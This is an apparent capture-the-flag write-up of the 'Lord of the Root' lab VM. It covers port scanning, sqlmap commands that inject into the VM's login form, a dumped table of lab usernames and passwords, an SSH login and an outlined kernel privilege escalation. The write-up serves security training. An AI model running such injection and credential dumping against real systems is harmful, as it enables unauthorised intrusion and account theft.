Load of the Root 1.0.1
Description ⤵️
I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP.
This is a boot-to-root machine will not require any guest interaction.
There are two designed methods for privilege escalation.
- 23/09/2015 == v1.0.1
- 22/09/2015 == v1.0
If you are having issues with VirtualBox, try the following:
- Downloaded LordOfTheRoot_1.0.1.ova (confirmed file hash)
- Downloaded and installed VMWare ovftool.
- Converted the OVA to OVF using ovftool.
Modified the OVF using text editor, and did the following:
replaced all references to “ElementName” with “Caption” replaced the single reference to “vmware.sata.ahci” with “AHCI”
- Saved the OVF. +Deleted the .mf (Manifest) file. If you do not you get an error when importing, saying the SHA does not match for the OVF (I also tried modifying the hash, but no luck).
- Try import the OVF file, and it should work fine.
Source: https://twitter.com/dooktwit/status/646840273482330112
Let’s find the IP Address first »
1
IP : 10.0.2.23
Port Scan Results ➡️
1
2
3
OPEN PORTS >
22 SSH
1337 HTTP
Web Enumeration ⤵️
1
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
1
Closer!
Sqlmap →
1
2
commands →
sqlmap -o -u http**://**10.0.2.23**:**1337**/**978345210**/**index.php --form --dbs --l
1
2
Command →
sqlmap -o -u http://10.0.2.23:1337/978345210/index.php --form --dbms m
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
+----+------------------+----------+
| id | password | username |
+----+------------------+----------+
| 1 | iwilltakethering | frodo |
| 2 | MyPreciousR00t | smeagol |
| 3 | AndMySword | aragorn |
| 4 | AndMyBow | legolas |
| 5 | AndMyAxe | gimli |
+----+------------------+----------+
Now lets try SSH login →
1
MyPreciousR00t
Now lets check the kernel version →
I found on web →
Let is try it out →
I got it →
Flag.txt →
Summery Notes →
💡 → sqlmap
→ post exploit can be done with exploiting kernel or ,
→ Buffer Overflow
If you have any questions or suggestions, please leave a comment below. Thank You !